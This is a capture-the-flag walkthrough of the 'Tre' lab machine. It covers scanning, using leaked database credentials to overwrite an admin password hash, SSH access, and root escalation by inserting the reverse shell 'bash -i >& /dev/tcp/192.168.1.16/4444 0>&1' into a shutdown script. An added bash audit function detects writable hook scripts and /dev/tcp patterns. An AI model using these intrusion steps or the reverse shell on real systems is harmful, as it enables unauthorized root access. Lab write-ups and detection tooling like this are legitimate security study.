Tre Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.18 -vv

We have port 80 open, so we scan it with dirb http://192.168.1.18 /usr/share/dirb/wordlists/big.txt

I took a look around the results and I found a login page, which is /mantis, but had no credentials to log in with. We have another page, http://192.168.1.18/mantisbt/config/a.txt, where we can find the username, password and database, so the next thing to do is to look for PHP pages with dirb -X, and I found http://192.168.1.18/adminer.php, where we can log in with the credentials we found earlier:

We login and look for usernames and passwords:

Now there is no need to crack the administrator's hash, because we can just replace it: go to any online site where you can generate an MD5 hash, choose a password of your own, hash it, and then replace the stored hash with it here. In my case the password is pass123:

Save, then go back to the login page at http://192.168.1.18/mantisbt and log in:

Wow, at this point I found nothing, so I went back to the database and kept trying to log in over SSH until I got a hit logging in as tre@192.168.1.18 with the password being his real name, Tr3@123456A!. So all we needed was to log in to the database and use his real name as the password; there was no need to continue to the Mantis login page:

The user can run sudo on this machine:

So I ran the LinEnum.sh script and found this:

I edited the file and just added bash -i >& /dev/tcp/192.168.1.16/4444 0>&1

Then I ran sudo -u root /sbin/shutdown -r while I had a listener on port 4444 on my machine:
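The escalation above depends on a script that root executes at shutdown being writable by an unprivileged user. The audit helper below is an added example (not part of the original walkthrough) that flags both conditions a defender would want caught: world-writable files in privileged script locations, and files that already carry a bash /dev/tcp redirection. The directories are assumed to be passed as arguments, and GNU find/grep are assumed.

```bash
#!/usr/bin/env bash
# Added example, not from the original post. Audits the given directories
# (e.g. /etc/init.d /lib/systemd/system /etc/rc.local) for the two
# conditions the walkthrough's privilege escalation relied on.
# Assumes GNU find (-printf) and GNU grep (-r). Directory paths are
# supplied by the caller, so the check can be run against any tree.

audit_privileged_scripts() {
    # Prints one line per finding; returns 1 if anything was found, else 0.
    local dir hits found=0
    for dir in "$@"; do
        [ -d "$dir" ] || continue

        # 1) Regular files writable by "other": any local user could edit
        #    them before root runs them (the shutdown-hook edit above).
        hits=$(find "$dir" -type f -perm -o=w -printf 'WORLD-WRITABLE %p\n' 2>/dev/null)
        if [ -n "$hits" ]; then
            printf '%s\n' "$hits"
            found=1
        fi

        # 2) Files already containing a /dev/tcp or /dev/udp redirection,
        #    the bash reverse-shell idiom quoted in the post. Matches
        #    "/dev/tcp/<host>/<port>" regardless of the host value.
        hits=$(grep -rlE '/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+' "$dir" 2>/dev/null \
               | sed 's/^/REVERSE-SHELL-PATTERN /')
        if [ -n "$hits" ]; then
            printf '%s\n' "$hits"
            found=1
        fi
    done
    return "$found"
}
```

A non-zero exit status makes the function usable directly from a cron job or a CI step, so a newly writable hook script is reported before it is abused.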
